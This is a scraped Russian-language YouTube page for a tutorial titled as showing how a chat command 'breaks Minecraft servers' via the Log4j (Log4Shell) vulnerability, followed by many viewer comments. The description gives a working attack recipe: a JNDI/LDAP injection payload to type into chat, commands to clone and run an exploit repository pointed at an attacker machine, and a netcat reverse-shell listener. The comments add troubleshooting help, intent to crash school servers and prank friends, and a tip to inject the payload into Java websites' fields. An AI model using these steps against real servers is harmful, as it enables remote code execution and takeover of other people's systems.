Уязвимость Log4j | Эта Команда в Чате ЛОМАЕТ СЕРВЕРА MINECRAFT

Рет қаралды 49,567

Күн бұрын

Как взломать сервер Майнкрафт? Очень просто. Для этого я буду использовать уязвимость Minecraft Log4J в Java коде. Уязвимость Log4j(log4shell) серьезно угрожает безопасности java приложений, в том числе серверам Майнкрафт: hypixel 2B2T PixelMon и другие. Взлом админки Майнкрафт стал возможен из-за этой уязвимости.
Таймкоды:
0:00 ▶️ Интро
0:25 ▶️ Log4j в действии
1:37 ▶️ Детальный гайд
Github репо:
github.com/davidbombal/log4jm...
Видео Дэвида:
• Minecraft hacking with...
Где купить хакерский сервак:
davidbombal.wiki/linode
Инструкция по установке сервера Minecraft:
www.dropbox.com/s/f0leevpga4e...
Raikia:
raikia.com/tool-powershell-en...
Код для Raikia:
gist.github.com/Maxet24/f7518...
Вместо 10.10.10.10 пишите адрес хакерской машины, а 80 меняете на 9898.
Команда в Майне:
${jndi:ldap://10.10.10.10:1389/Log4JCE}
*Замените 10.10.10.10 на ip машины.
Команды в консоли после подключения к Linode:
* Первая консоль
git clone github.com/davidbombal/log4jm...
python3 log4j.py ip_адрес
* Вторая консоль
python3 jcomp_pyserv.py
Команда для reverse shell:
nc -lnvp 9898
Донатик на микро:
www.donationalerts.com/r/maxe...

Пікірлер: 349

@overbafer1 2 жыл бұрын

Молодец

@MaxetTV 2 жыл бұрын

Обалдеть! Коллега, ваши ролики вдохновили меня на создание этого!

@overbafer1 2 жыл бұрын

@@MaxetTV вы мне льстите, коллега)

@MaxetTV 2 жыл бұрын

@@overbafer1 Кстати, у вас было желание сделать видео на эту хайповую тему? По крайней мере VidIQ показывал хорошую цифру по данной теме.

@overbafer1 2 жыл бұрын

@@MaxetTV а вот скоро узнаете)

@frostxgg 2 жыл бұрын

@@overbafer1 а вот и сделал)

@user-so8lh1rr5y 2 жыл бұрын

Те, кто пришли от овербафера: Майнкрафт со стороны клиента исправили эту уязвимость. Школолосервера всё ещё можно ломать, но это некоторые, ядра для серверов в большинстве тоже исправили уязвимость, то есть, если уязвимость работает, то исключительно на сервере, работать с пк через клиент уже не сможете.

@xgre4ax689 2 жыл бұрын

@MaxetTV 2 жыл бұрын

Подтверждаю.

@mamalol739 2 жыл бұрын

Если клиент не обновлять , то другим пользователям можно кидать вредоносный код ??

@user-so8lh1rr5y 2 жыл бұрын

@@mamalol739 дело не в твоём клиенте, а в клиенте игрока. И это всё обрабатывается в первую очередь через сервер, а как я сказал выше, почти все серверные ядра исправили уязвимость.

@user-gl4of4zf5l 2 жыл бұрын

поподробнее пожалуйста

@ldefault4593 2 жыл бұрын

Наконец-то хоть кто-то сделал видео-гайд как запустить калькулятор. Хоть и таким способом

@_nifer_ 3 ай бұрын

Ага а то 50 часовой гайд смотреть не очень

@gesser163 2 жыл бұрын

Maxet, я тебя поздравляю, это именно то, что люди называют Успех! 😊

@loopy7545 2 жыл бұрын

Спасибо за столь подробный гайд! Респект

@darknesxaker8514 2 жыл бұрын

Ты большой молодец продолжай пилить ролики дальше:)

@timgauka. 2 жыл бұрын

Спасибо, желаю удачи в начинаниях

@MaxetTV 2 жыл бұрын

Спасибо!

@romashkavvs7111 2 жыл бұрын

А можно Инстаграм или группу вк ?

@MaxetTV 2 жыл бұрын

@@romashkavvs7111 Хех, еще не создавал, работаю над новым видиком. Если нужно, могу сделать группу)

@XEHDEPCOH 2 жыл бұрын

хорошый гайд продолжай в том же духе надеюсь что скоро у тебя будет 100к подпищиков)

@matvey3d28 2 жыл бұрын

Кто здесь от Овербафера?

@TvoyOtchimPupsik Жыл бұрын

@Vlad-ck9mh Жыл бұрын

@NoobTop1584 Жыл бұрын

@user-qr8fq5xn1h Жыл бұрын

Овербафер топ

@MangoGoo 2 жыл бұрын

Привет, автор :) (извини, что не знаю твоего имени). Видос очень интересный, сам учусь разбираться в Linux системах, т.к собираюсь поступать на инфбезопасность. Продолжай в том же духе, обязательно буду ждать новое видео 😄

@leoverem14 6 ай бұрын

Без лишнего мусора в начале, все чётко.

@Baton253 2 жыл бұрын

Красава!!!! Привет от ОВЕРА

@murcklack 2 жыл бұрын

Пришел от крупного крекера ( сами знаете от кого) спасибо за подробный гайд ,желаю удачи!

@slavaarstocke 2 жыл бұрын

Спасибо, что руссифицировал видео Дэвида, очень удобно)

@MaxetTV 2 жыл бұрын

Рад помочь! Буду делать больше переводов скоро👍

@willingsquire7773 2 жыл бұрын

А я ничего не понял :((((

@vespereclivus8788 2 жыл бұрын

@@MaxetTV надеюсь не забросишь, месяц назад это видео вышло, если что готов даже чем-то помочь

@user-qy9pd3oe1v 2 жыл бұрын

Зааааааааааачем показывать игрокам как это делать!!!

@MaxetTV 2 жыл бұрын

@@vespereclivus8788 все нормально, я готовлю видос про актуальный взлом вай фая. Соберу всё самое сочное.

@cybertortik 2 жыл бұрын

МОлодец !

@_w0nd 6 ай бұрын

Объяснил всё очень хорошо,, гайд очень подробный

@Vamaka12 2 жыл бұрын

Ку от Овера)

@mubifay_yt_7644 2 жыл бұрын

Спасибо, чел, давно искал

@faghoga584 2 жыл бұрын

привет от overbafer!)

@user-ev8jv1qd5y 2 жыл бұрын

Привет от овера) удачи

@Calibration788 2 жыл бұрын

Привет тебе от лучшего хацкера на ЮТ Overbafer1

@Johninoster 2 жыл бұрын

Привет. Сделал все тоже самое, что у тебя в видосе. Версия java на моем серваке соответствует версии на ubuntu. Версия майнкрафта 1.8.8. Когда запускаю LDAP сервак и сервер на питоне, они не ловят пакеты после того, как отправляю саму консольную команду. Айпи в команде правильный. Я проверял) Заранее спасибо)

@MaxetTV 2 жыл бұрын

Привет! Та же проблема была сначала. Попробуй использовать гайд в описании для сервака.

@MaxetTV 2 жыл бұрын

github.com/davidbombal/log4jminecraft/issues/1#issuecomment-997412958 Вот посмотри ответ Девида, здесь ссылка на java нужной версии.

@ANUARKA 2 жыл бұрын

Короче краткий итог который сэкономил бы время, баг поправили на версии 1.8.1 да и большинство 1.8 не работают. Поэтому берите версии 1.12.2 там можно еще поиграться, но большинство серверов поправили, плюс клиент т лаунчера тоже обновили и теперь открыть калькулятор не получится, но сервер положить пока можно

@mmoreshki111 2 жыл бұрын

ролики выходят стабильно

@VEYSKAN 2 жыл бұрын

Шикарно

@ristocrat7021 2 жыл бұрын

Нужно больше русификаций (с гайдами так вообще супер)! Как тебе задонатить, друг? Реквизиты добавь

@MaxetTV 2 жыл бұрын

Спасибо за поддержку! Обязательно сделаю! И, да, добавил ссылку на DonationAlerts в описании.

@neronkalite7539 2 жыл бұрын

Можешь рассказать, как все проделать на своем компьютере?

@Milerook 2 жыл бұрын

Уважаемый, да у вас будущее есть. Продолжай в том же духе, очень классно.

@alexsanderolshanskiyprod.4701 2 жыл бұрын

Офигеть сработало)

@alexsanderolshanskiyprod.4701 2 жыл бұрын

правда перенаправить консоль не получилось...

@fnigtcore9262 Жыл бұрын

кто-то: почему Лондон, а не париж? я: 2:30

@qelvu-tytyay 2 жыл бұрын

хорош

@Skeleton-in-boots 2 жыл бұрын

вопрос порт 9898 необходимо использовать? или можно по другому порту?(любому? не-знаю)

@sofgaming5514 2 жыл бұрын

Привет от овербафера

@user-vm9lt5sw1w Жыл бұрын

Спасибо хацкерам за новый способ открыть интернет експлорер

@felsher2917 2 жыл бұрын

Лайк

@hehekovc_zhiv 9 ай бұрын

а сервер на linode обязателен?

@levshx 2 жыл бұрын

Уязвимость работает так же и для сайтов на Java, только команды ${jndi:ldap *} не в чат, а в любое текстовое поле сайта, или get параметр URL.

@DarkCoder15 2 ай бұрын

Это только если jndi ldap выведется в логах

@felefit 2 жыл бұрын

Крутой контент) Я от овера

@loa2395 2 жыл бұрын

Привет от overbafer1

@kalilinux1515 2 жыл бұрын

Чел хорош

@Shortskz 2 жыл бұрын

Я от Овера ✊

@artoriasYT 2 жыл бұрын

Ку, будут новые видосы?

@_nifer_ 3 ай бұрын

Это одновременно и круто и очень плохо Есть такие люди которые всю жизнь обижаются на всех и все. И они будут творить специально то что ты только что показал на видио ради удовольствия, будут взламывать людей только потомучто им хочется. Но автор и молодец он и покащал уязвимости которые можно понять.

@antonee0 2 жыл бұрын

ждём разбора на пк

@user-lc3oc9br8q 2 жыл бұрын

я только не понял. вводить нужно свой ип или ип сервера?

@zaz087 2 жыл бұрын

ту руруу привет от овера

@PlayKO 2 жыл бұрын

спс за тутор на калькулятор

@the_naf1 2 жыл бұрын

Привет от овера

@pti4kabeats 2 жыл бұрын

Пока вы крашите майнкрафт сервера, некоторые взламывают банки с помощью той же самой уязвимости

@V1tal9 2 жыл бұрын

служба безопасности уведомила все банки быстрее чем ты глазом моргал, и это инстантно пофиксили

@Killytu 2 жыл бұрын

шо делать в консоли сервера Reference Class Name: foo а в логах Send LDAP reference result for Log4JCE redirecting to мой айпи

@besmile7254 2 жыл бұрын

Треугольник ты ли это ? ))

@middle968 2 жыл бұрын

А сервер майнкрафта на каком порте запускать?

@mirvix 2 жыл бұрын

Надеюсь что это видео ютуб не удалить

@firefoxlive1912 2 жыл бұрын

От овербафера

@mem23963 6 ай бұрын

Что за приложение справо от майнкрафта?

@poddias3773 2 жыл бұрын

всё теперь максет станет миллионником

@user-he2gl2oz1q 2 жыл бұрын

Или что делать если пкд пишется что Conecting timed out?

@ruria_coda 2 жыл бұрын

Не только minecraft!

@ruria_coda 2 жыл бұрын

А код для raika исходник на java code.txt?

@nezer3031 2 жыл бұрын

Новый способ троллить друзей) или если кто то на сервере не знает как открыть калькулятор

@LeleMagisterMeister 2 жыл бұрын

Привет от детей овера!!!

@ddsjvt 2 жыл бұрын

скажите че за консоль с кодом мне нада крашнуть школо сервер де 2 класники говорят они 7-9-11 класники

@miron2211 Жыл бұрын

А работает эта уязвимость на сервере aternos? Хочу над другом пошутить

@murattkachuk1495 2 жыл бұрын

Автор: Запомните этот способ взлома использавать толька на своих серверах я:ПОГНАЛИ ВЗЛАМЫВАТЬ ПЕНТАГОН

@murattkachuk1495 2 жыл бұрын

@@peepooos я понимаю что серьёзное но зачем показывать как это делать если это можно юзать толька на своем сервере

@user-wt5jz6xg3p 2 жыл бұрын

@@murattkachuk1495 Не на своём. Любой человек в чате может написать эту команду, указав сервер на котором стоит файл-код. И он выполнится.

@livesey05 2 жыл бұрын

@@peepooos лол он рофлить не может? чел...

@Abobus-dt8qe 2 жыл бұрын

@@peepooos ты считаешь это видео серьёзным?

@Abobus-dt8qe 2 жыл бұрын

@pcheoa1337 банков... Взломали? Я посмеялся

@pflufc3137 2 жыл бұрын

Возникла такая проблема: Всё настроено под ip vmware с ubuntu, работает сервер с http и LDAP, но когда я пишу команду, ничего не происходит, LDAP запрос отправляется, но class с сервера http не берётся, следственно не работает и cам скрипт, открыл все нужные порты на вм, пробросил даже порты через NAT, но как будто сервер просто отказывается брать файл с сервера, помогите решить это проблему пожалуйста.

@bgcstar6447 2 жыл бұрын

у меня вопрос.Обязательно делать свой сервер?И вообще можно использовать не айпи сервера а свой?

@Banka_Storm 2 жыл бұрын

он проделывал это на своём сервере, что бы никому не навредить. логично

@fills6069 2 жыл бұрын

Привет как установить git что бы команды в терминале работали? ТК когда пытаюсь установить репозиторий ""git" не является внутренней или внешней"

@MaxetTV 2 жыл бұрын

Ты Linode используешь? Или свой? Если свой, то в Винде нужно переменную среды поставить.

@fills6069 2 жыл бұрын

@@MaxetTV А как это зделать? И можно ли это просто зделать через Git Bash?

@f1nke88 Жыл бұрын

@@MaxetTV Ответь пж а переменная на что на java

@t-sepie6637 11 күн бұрын

linode не запускается в казахстане ошыбка при регестрацый можеш посаветоват анлаог этой программмый

@darmellerchannel 2 жыл бұрын

Слушай, а могут ли хакеры зайти на твой локальный сервер с другом. Мы с другом к одной сети wi fi подключенны.

@marcher6668 2 жыл бұрын

Могут

@darmellerchannel 2 жыл бұрын

@@marcher6668 Мы вот играем уже пятый день нас никто не трогает.А если кто зайдёт быстро alt+F4 и все

@marcher6668 2 жыл бұрын

@@darmellerchannel уже закрыли дыру в Tlauncher там внутри была папка log4jfix

@marcher6668 2 жыл бұрын

@@darmellerchannel почти закрыли

@Guave1030 2 жыл бұрын

а что за консоль программа которая открывает много консолей где ты подключился к серверу через айпи

@marcher6668 2 жыл бұрын

Netcat удаленная Шелл(консоль)

@m16ka 2 жыл бұрын

Привет вам несказанно повезло

@hackerq9866 15 күн бұрын

Кто тоже заметил что он пишет не Log4jRCE, а Log4JCE

@vodeninja6999 2 жыл бұрын

привет выдает ошибку при билде ```[ERROR] Failed to execute goal org.apache.maven.plugins:maven-compiler-plugin:3.1:compil```

@fedotsys2087 2 жыл бұрын

От овера

@arroen2128 2 жыл бұрын

а у меня ворпрос это уже же пофиксили???

@asilbek_murotqulov Ай бұрын

omg hehehehehhehehe

@WaRsNice 2 жыл бұрын

ты в видео у овербафера

@user-pm3ex7dw7t 2 жыл бұрын

А что делать если выдаёт Неизвестная команда nc -lnvp 9898

@hagaruma3800 Жыл бұрын

не сохраняется файл когда редачу через nano

@Fayronchik 2 жыл бұрын

Помоги мне пишет что мой айпи неправильный (пишу айпи с 2айпи)

@danim1992 2 жыл бұрын

после того как поставил софт с гетхаба самопроизвольно начались включатся разные игры приложения и тд...

@Jodexx_ 2 жыл бұрын

Это не из-за софта.

@Fayronchik 2 жыл бұрын

Помоги что делать пишет то такого Файла нет log4j.py

@nohais 2 жыл бұрын

Привет, я не понимаю, я сделал все по твоей инструкции, кроме хоста (Мне пишут что я мошенник), но купил с теме же параметру у другого хоста, вкл все загрузил и загрузилось, открываю локальный сервер, пишу код и ничего не происходит, подумал ядро блочит, скачал старое ядро, без результата

@ANUARKA 2 жыл бұрын

на большинстве серверов уже пофикисли

@Baton253 2 жыл бұрын

Добавь ссылку на донат!!!

@t-sepie6637 11 күн бұрын

linode не запускается в казахстане ошыбка при регестрацый можеш посаветоват анлаог Провереный

@ghostso2892 2 жыл бұрын

какие порты надо открывать для юязвимости?

@ghostso2892 2 жыл бұрын

@Eneez чел ну вопервых откуда тебе знать какая у меня ОС

@ghostso2892 2 жыл бұрын

@Eneez а причем тут видео 2 года давности?

@surumaki6599 Жыл бұрын

кто то что то понял? я просто как овоШ сижу и не понимаю как это делается пойду смотреть поновой

@DHMolten 2 жыл бұрын

Хорошо что у меня не лицензия:)

@dudha369 2 жыл бұрын

А для чего нужен Lincode? Это типа виртуалка, или хостинг для сервера? Если хостинг, о зачем ты у себя на машине запустил сервак?

@cullfy8278 2 жыл бұрын

реклама мб прост и интеграция уместная

@genrymorgan1140 2 жыл бұрын

Привет, подскажи, если в консоль, которая слушает 1389 порт приходят пакеты какие то(пишет что перекидывает все на файл .class), но дальше ничего не происходит, как будто до jcomp_pyserv.py ничего не доходит

@MaxetTV 2 жыл бұрын

У меня такое же было. Сервак значит не тот. Чекни вот эту ветку гитхаб, там Дэвид мне всё объяснил. github.com/davidbombal/log4jminecraft/issues/1

@MaxetTV 2 жыл бұрын

@@genrymorgan1140 не, ребят, мне уже столько людей пишет, я принимаю с этого момента правило Овера.

@genrymorgan1140 2 жыл бұрын

@@MaxetTV окей, без б

@Master-hr6ep 2 жыл бұрын

что делать если пишет time out

@Timpixel2020 2 жыл бұрын

Просто скачайте плагин Log4jExploitFix, незнаю, обеспечит ли он полную безопасность, но у меня эта уязвимость исчезла.

@zarik5313 3 ай бұрын

А как сделать без linode на линуксе

@falsebigmonser381 5 ай бұрын

А как работать с ним без linode?

@robin_v10 2 жыл бұрын

Ставь лайк если пришёл от овера)))

@user-ms4uu1sr7w 2 жыл бұрын

пожалуста ответь как збросить пароль от ip

@dinek0d266 2 жыл бұрын

Есть несколько вопросиков: Для этого обязательно использовать динамический IP? Можно ли так взломать сервера Garry's Mod?

@thevilforce 2 жыл бұрын

1. Да 2. Если только бы Гаррис мод был написал на java, и к тому же, если бы это и было так, то это бы уже пофиксили.

@dinek0d266 2 жыл бұрын

@@thevilforce благодарю

@molikoq 2 жыл бұрын

@@thevilforce работает сейчас?

@marcher6668 2 жыл бұрын

@@molikoq почти нет если будет обход этого Эксплуатации

@marcher6668 2 жыл бұрын

@@molikoq жди обход

@OVERTY963 Жыл бұрын

Raika не работает, что делать?

@t-sepie6637 11 күн бұрын

linode не запускается в казахстане

@erhgure4hghnu Жыл бұрын

Жаль что это на винде не проделать